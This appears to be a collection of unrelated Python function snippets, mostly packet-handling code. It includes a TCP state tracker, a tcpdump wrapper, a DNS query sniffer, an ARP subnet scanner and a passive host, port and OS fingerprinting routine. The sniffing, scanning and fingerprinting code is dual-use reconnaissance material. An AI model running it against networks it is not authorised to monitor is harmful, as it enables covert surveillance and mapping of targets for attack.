self._s_state == TCPState.CLOSING:\n if ack_flag:\n slide_window()\n if sip == self.sip and num_pkt_session_pkt < len(self.sessions[self.session_count]):\n if inc_tcp_seq_number(ack_flag and prev_s_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and \\\n inc_tcp_seq_number(ack_flag and prev_c_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n logger.info(\"Packet didn't match any valid state: {}\".format(tcp_pkt_debug_info(ip)))\n #self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n logger.debug(self.get_printable_state())", "def start_capture(self, interface, count=0, ptype='', pfilter=None,\n callback=None, callback_args=None, save_dump_file=False,\n save_dump_filename=None):\n tcpd = (self.packet_captures[interface]\n if interface in self.packet_captures\n else TCPDump())\n \"\"\" :type: TCPDump \"\"\"\n\n self.LOG.debug('Starting tcpdump on host: ' + self.name)\n\n old_log = self.cli.log_cmd\n if self.debug:\n self.cli.log_cmd = True\n\n tcpd.start_capture(cli=self.cli, interface=interface, count=count,\n packet_type=ptype, pcap_filter=pfilter,\n callback=callback, callback_args=callback_args,\n save_dump_file=save_dump_file,\n save_dump_filename=save_dump_filename,\n blocking=False)\n\n self.cli.log_cmd = old_log\n\n self.packet_captures[interface] = tcpd", "def tcp_pkt_debug_info(pkt: dpkt.ip.IP) -> str:\n if isinstance(pkt, dpkt.ip.IP):\n paylod_len = pkt.len - (4 * pkt.hl) - (4 * pkt.data.off)\n return \"{}:{}-> {}:{}, seq: {}, ack:{}, flag:{}, payload len: {}, payload: {}, sum: {}\".format(\n inet_to_str(pkt.src), pkt.data.sport, inet_to_str(pkt.dst), pkt.data.dport, hex(pkt.data.seq),\n hex(pkt.data.ack), hex(pkt.data.flags), hex(paylod_len), pkt.data.data, hex(pkt.data.sum))", "def process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[saddr, sport, daddr, dport][co.S2C] >= 0:\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.S2C][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[saddr, sport, daddr, dport][co.S2C]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.S2C][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n # If SOCKS command\n if size_payload == 7 and connections[conn_id].attr.get(co.SOCKS_PORT, None) is None:\n crypted_socks_cmd = tcp.data\n # This is possible because of packet stripping\n if len(crypted_socks_cmd) == 7:\n decrypted_socks_cmd = socks_parser.decode(crypted_socks_cmd)\n if decrypted_socks_cmd[0] == b'\\x01': # Connect\n connections[conn_id].attr[co.SOCKS_DADDR] = socks_parser.get_ip_address(decrypted_socks_cmd)\n connections[conn_id].attr[co.SOCKS_PORT] = socks_parser.get_port_number(decrypted_socks_cmd)\n\n if size_payload > 0 and tcp.seq in acks[saddr, sport, daddr, dport][SEQ_C2S]:\n # This is a retransmission! (take into account the seq overflow)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][0],\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1],\n ts_delta - acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT]))\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[saddr, sport, daddr, dport][SEQ_C2S].add(tcp.seq)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[saddr, sport, daddr, dport][SEQ][co.C2S]) >= 3000000:\n# for x in range(50000):\n# acks[saddr, sport, daddr, dport][SEQ][co.C2S].popleft()\n\n acks[saddr, sport, daddr, dport][co.S2C] = tcp.ack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta", "def query_sniff(pkt):\n if IP in pkt:\n ip_src = pkt[IP].src\n ip_dst = pkt[IP].dst\n\n if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:\n domain = pkt.getlayer(DNS).qd.qname.decode(\"utf-8\")\n now = datetime.now()\n stored_dns_requests.update({datetime.timestamp(now): domain})\n print(\"SRC: {} - DST: {} : {}\".format(ip_src, ip_dst, domain))", "def _get_next_packet(self):\n raise NotImplementedError(\"Do not instantiate csvAbstractReader directly.\")", "def receive_captured_list(self):\n reply = self.socket.recv(4096)\n print(\"Pokemon capturados\")\n print(reply[1:].decode())", "def scan(ip):\n arp_request = scapy.ARP(pdst=ip)\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n arp_request_broadcast = broadcast/arp_request\n answered_list = scapy.srp(arp_request_broadcast , timeout = 1, verbose=False)[0]\n target_list=[]\n for element in answered_list:\n target_dict = {\"ip\":element[1].psrc, \"mac\":element[1].hwsrc}\n target_list.append(target_dict)\n return target_list", "def processpacket(p):\n\n\tglobal SynSentToTCPService\n\tglobal SynAckSentToTCPClient\n\tglobal LiveTCPService\n\tglobal LiveTCPClient\n\tglobal LiveUDPService\n\tglobal LiveUDPClient\n\tglobal NmapServerDescription\n\tglobal ManualServerDescription\n\tglobal ClientDescription\n\tglobal MacAddr\n\tglobal OSDescription\n\tglobal ServiceFPs\n\tglobal SipPhoneMatch\n\tglobal Devel\n\tglobal IsRouter\n\tglobal DNSRecord\n\tglobal HostIPs\n\n\tif (type(p) == Dot3) and (type(p['LLC']) == LLC):\n\t\tUnhandledPacket(p)\n\t\t#Spanning Tree Protocol\n\t\t#Debug(\"802.3\")\n\t\t#p.show()\n\t\t#print type(p['LLC'])\n\telif (p['Ethernet'] == None):\n\t\tDebug(\"non-ethernet packet\")\t\t#Need more details on how to handle.\n\t\tUnhandledPacket(p)\n\t\t#p.show()\n\t\t#print type(p)\n\t\t#quit()\n\telif p['Ethernet'].type == 0x0806:\t\t#ARP\n\t\t#pull arp data from here instead of tcp/udp packets, as these are all local\n\t\tif (p['ARP'].op == 1):\t\t\t#1 is request (\"who-has\")\n\t\t\tpass\n\t\tif (p['ARP'].op == 2):\t\t\t#2 is reply (\"is-at\")\n\t\t\tif (p['ARP.psrc'] != None) and (p['ARP.hwsrc'] != None):\n\t\t\t\tIPAddr=p['ARP.psrc']\n\t\t\t\tMyMac=p['ARP.hwsrc'].upper()\n\t\t\t\tif (not MacAddr.has_key(IPAddr)) or (MacAddr[IPAddr] != MyMac):\n\t\t\t\t\tReportId(\"MA\", IPAddr, 'Ethernet', MyMac, '')\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x0800:\t\t#IP\n\t\tsIP=str(p['IP'].src)\n\t\tdIP=str(p['IP'].dst)\n\t\t#Best to get these from arps instead; if we get them from here, we get router macs for foreign addresses.\n\t\t#if not MacAddr.has_key(sIP):\n\t\t#\tReportId(\"MA\", sIP, \"Ethernet\", p['Ethernet'].src, '')\n\t\t#if not MacAddr.has_key(dIP):\n\t\t#\tReportId(\"MA\", dIP, \"Ethernet\", p['Ethernet'].dst, '')\n\n\t\tif p['IP'].proto == 1:\t\t\t#ICMP\n\t\t\tType = p['ICMP'].type\n\t\t\tCode = p['ICMP'].code\n\n\t\t\tif (Type == 0):\t\t\t\t\t\t#Echo reply\n\t\t\t\tif (not(OSDescription.has_key(sIP))):\n\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", 'icmp echo reply')\n\t\t\telif (Type == 3) and (type(p[IPerror]) == IPerror):\t#Unreachable, check that we have an actual embedded packet\n\t\t\t\t#if (type(p[IPerror]) != IPerror):\n\t\t\t\t#\tp.show()\n\t\t\t\t#\tprint type(p[IPerror])\n\t\t\t\t#\tquit()\n\t\t\t\tOrigdIP = p[IPerror].dst\n\t\t\t\tif (Code == 0):\t\t\t\t\t#Net unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"NetUn\", \"router\", \"\")\n\t\t\t\telif (Code == 1):\t\t\t\t#Host unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"HostUn\", \"router\", \"\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 17):\t#Port unreachable and embedded protocol = 17, UDP, as it should be\n\t\t\t\t\tDNSServerLoc = p[IPerror].src + \",UDP_53\"\n\t\t\t\t\tif (p[UDPerror].sport == 53) and (ManualServerDescription.has_key(DNSServerLoc)) and (ManualServerDescription[DNSServerLoc] == \"dns/server\"):\n\t\t\t\t\t\t#If orig packet coming from 53 and coming from a dns server, don't do anything (closed port on client is a common effect)\n\t\t\t\t\t\t#Don't waste time on port unreachables going back to a dns server; too common, and ephemeral anyways.\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\t#If orig packet coming from something other than 53, or coming from 53 and NOT coming from a dns server, log as closed\n\t\t\t\t\t\tOrigDPort = str(p[UDPerror].dport)\n\t\t\t\t\t\tOrigDstService = OrigdIP + \",UDP_\" + OrigDPort\n\t\t\t\t\t\tif ((not LiveUDPService.has_key(OrigDstService)) or (LiveUDPService[OrigDstService] == True)):\n\t\t\t\t\t\t\tLiveUDPService[OrigDstService] = False\n\t\t\t\t\t\t\tReportId(\"US\", OrigdIP, \"UDP_\" + OrigDPort, \"closed\", \"port unreachable\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 6) and (p[TCPerror].dport == 113):\t#Port unreachable and embedded protocol = 6, TCP, which it shouldn't. May be the same firewall providing the TCP FR's\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 6):\t\t\t\t#Net unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unknown')\n\t\t\t\telif (Code == 7):\t\t\t\t#Host unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unknown')\n\t\t\t\telif (Code == 9):\t\t\t\t#Network Administratively Prohibited\n\t\t\t\t\tpass\t\t\t\t\t#Can't tell much from this type of traffic. Possibly list as firewall?\n\t\t\t\telif (Code == 10):\t\t\t\t#Host Administratively Prohibited\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 11):\t\t\t\t#Network unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 12):\t\t\t\t#Host unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 13):\t\t\t\t#Communication Administratively prohibited\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (Type == 8):\t\t\t\t\t#ping\n\t\t\t\t#FIXME - check payload for ping sender type, perhaps\n\t\t\t\tpass\n\t\t\telif (Type == 11):\t\t\t\t\t#Time exceeded\n\t\t\t\tif (Code == 0):\t\t\t\t\t#TTL exceeded\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\t#FIXME - put original target IP as column 5?\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"TTLEx\", \"router\", \"\")\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 2:\t\t#IGMP\n\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 6:\t\t#TCP\n\t\t\tsport=str(p['TCP'].sport)\n\t\t\tdport=str(p['TCP'].dport)\n\t\t\t#print p['IP'].src + \":\" + sport + \" -> \", p['IP'].dst + \":\" + dport,\n\t\t\tif (p['TCP'].flags & 0x17) == 0x12:\t#SYN/ACK (RST and FIN off)\n\t\t\t\tCliService = dIP + \",TCP_\" + sport\n\t\t\t\tif not SynAckSentToTCPClient.has_key(CliService):\n\t\t\t\t\tSynAckSentToTCPClient[CliService] = True\n\n\t\t\t\t#If we've seen a syn sent to this port and have either not seen any SA/R, or we've seen a R in the past:\n\t\t\t\t#The last test is for a service that was previously closed and is now open; report each transition once.\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == False)) ):\n\t\t\t\t\tLiveTCPService[Service] = True\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", '')\n\t\t\telif (p['TCP'].flags & 0x17) == 0x02:\t#SYN (ACK, RST, and FIN off)\n\t\t\t\tService = dIP + \",TCP_\" + dport\n\t\t\t\tif not SynSentToTCPService.has_key(Service):\n\t\t\t\t\tSynSentToTCPService[Service] = True\n\t\t\t\t#Debug(\"trying to fingerprint \" + sIP)\n\t\t\t\ttry:\n\t\t\t\t\tp0fdata = p0f(p)\n\t\t\t\t\t#FIXME - reasonably common occurence, don't whine, just fix it.\n\t\t\t\t\t#if (len(p0fdata) >1):\n\t\t\t\t\t#\tDebug(\"More than one OS fingerprint for \" + sIP + \", using the first.\")\n\t\t\t\t\tif (len(p0fdata) >=1):\n\t\t\t\t\t\tPDescription = p0fdata[0][0] + \" \" + p0fdata[0][1] + \" (\" + str(int(p0fdata[0][2]) + 1)\t#FIXME - Grabbing just the first candidate, may need to compare correlation values; provided?\n\t\t\t\t\t\tif (p0fdata[0][2] == 0):\n\t\t\t\t\t\t\tPDescription = PDescription + \" hop away)\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tPDescription = PDescription + \" hops away)\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t#[N][2] param appears to be distance away in hops (but add 1 to this to get real hop count?)\n\t\t\t\t\t\tPDescription = PDescription.replace(',', ';')\t\t#Commas are delimiters in output\n\t\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\t\texcept:\n\t\t\t\t\tPDescription = 'p0f failure'\n\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\tDebug(\"P0f failure in \" + sIP + \":\" + sport + \" -> \" + dIP + \":\" + dport)\n\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\telif (p['TCP'].flags & 0x07) == 0x01:\t#FIN (SYN/RST off)\n\t\t\t\tCliService = sIP + \",TCP_\" + dport\n\t\t\t\tif ( (SynAckSentToTCPClient.has_key(CliService)) and ((not LiveTCPClient.has_key(CliService)) or (LiveTCPClient[CliService] == False)) ):\n\t\t\t\t\tLiveTCPClient[CliService] = True\n\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", '')\n\t\t\telif (p['TCP'].flags & 0x07) == 0x04:\t#RST (SYN and FIN off)\n\t\t\t\t#FIXME - handle rst going in the other direction?\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == True)) ):\n\t\t\t\t\tLiveTCPService[Service] = False\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"closed\", '')\n\t\t\telif ((p['TCP'].flags & 0x3F) == 0x15) and (sport == \"113\"):\t#FIN, RST, ACK (SYN, PSH, URG off)\n\t\t\t\t#This may be a firewall or some other device stepping in for 113 with a FIN/RST.\n\t\t\t\tpass\n\t\t\telif (p['TCP'].flags & 0x17) == 0x10:\t#ACK (RST, SYN, and FIN off)\n\t\t\t\t#FIXME - check for UnhandledPacket placement in ACK\n\t\t\t\tFromPort = sIP + \",TCP_\" + sport\n\t\t\t\tToPort = dIP + \",TCP_\" + dport\n\t\t\t\tPayload = str(p['Raw.load'])\t\t\t#For some reason this doesn't handle p['Raw'].load\n\t\t\t\tif ( (LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True) and (LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\n\t\t\t\t\tprint \"Logic failure: both \" + FromPort + \" and \" + ToPort + \" are listed as live services.\"\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\telif ((LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True)):\t#If the \"From\" side is a known TCP server:\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort) ):\t\t#Check nmap fingerprint strings for this server port\n\t\t\t\t\t\tif (ServiceFPs.has_key(int(sport))):\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs[int(sport)]:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\t#Debugging:\n\t\t\t\t\t\t\t\t\t#FIXME - removeme once understood:\n\t\t\t\t\t\t\t\t\t#File \"/home/wstearns/med/programming/python/passer/passer.py\", line 504, in processpacket\n\t\t\t\t\t\t\t\t\t#OutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\t#TypeError: expected a character buffer object\n\t\t\t\t\t\t\t\t\tif (OneTuple[1] == None):\n\t\t\t\t\t\t\t\t\t\tDebug(\"Null description for \" + OneTuple[0])\n\t\t\t\t\t\t\t\t\t\t#quit()\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\t#Example: Replace \"$1\" with MatchObj.group(1)\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), str(MatchObj.group(Index)))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t#Exit for loop, no need to check any more fingerprints now that we've found a match\n\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort)):\t\t#If the above loop didn't find a server description\n\t\t\t\t\t\tif (ServiceFPs.has_key('all')):\t\t\t\t#Now recheck against regexes not associated with a specific port (port 'all').\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs['all']:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif (not ManualServerDescription.has_key(FromPort) ):\n\t\t\t\t\t\tif (sport == \"22\") and (Payload != None) and (Payload.find('SSH-') > -1):\n\t\t\t\t\t\t\tif ( (Payload.find('SSH-1.99-OpenSSH_') > -1) or (Payload.find('SSH-2.0-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/openssh\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/openssh\"\n\t\t\t\t\t\t\telif (Payload.find('SSH-1.5-') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/generic\"\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' ESMTP Sendmail ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/sendmail\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/sendmail\"\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' - Welcome to our SMTP server ESMTP') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t#Check for port 80 and search for \"Server: \" once\n\t\t\t\t\t\telif (sport == \"80\") and (Payload != None) and (Payload.find('Server: ') > -1):\n\t\t\t\t\t\t\tif (Payload.find('Server: Apache') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/apache\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/apache\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Embedded HTTP Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/embedded\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/embedded\"\n\t\t\t\t\t\t\telif (Payload.find('Server: gws') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/gws\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/gws\"\n\t\t\t\t\t\t\telif (Payload.find('Server: KFWebServer') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/kfwebserver\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/kfwebserver\"\n\t\t\t\t\t\t\telif (Payload.find('Server: micro_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/micro-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/micro-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Microsoft-IIS') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/iis\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/iis\"\n\t\t\t\t\t\t\telif (Payload.find('Server: lighttpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/lighttpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/lighttpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: MIIxpc') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mirrorimage\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mirrorimage\"\n\t\t\t\t\t\t\telif (Payload.find('Server: mini_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mini-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mini-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nc -l -p 80') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nc\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nc\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nginx/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nginx\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nginx\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Nucleus') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nucleus\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nucleus\"\n\t\t\t\t\t\t\telif (Payload.find('Server: RomPager') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/rompager\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/rompager\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/server\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/server\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Sun-ONE-Web-Server/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/sun-one\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/sun-one\"\n\t\t\t\t\t\t\telif (Payload.find('Server: TrustRank Frontend') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/trustrank\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/trustrank\"\n\t\t\t\t\t\t\telif (Payload.find('Server: YTS/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/yahoo\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/yahoo\"\n\t\t\t\t\t\t\telif (Payload.find('HTTP/1.0 404 Not Found') > -1) or (Payload.find('HTTP/1.1 200 OK') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/generic\"\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"110\") and (Payload != None) and (Payload.find('POP3 Server Ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"pop3/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"pop3/generic\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find('* OK dovecot ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/dovecot\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/dovecot\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find(' IMAP4rev1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", 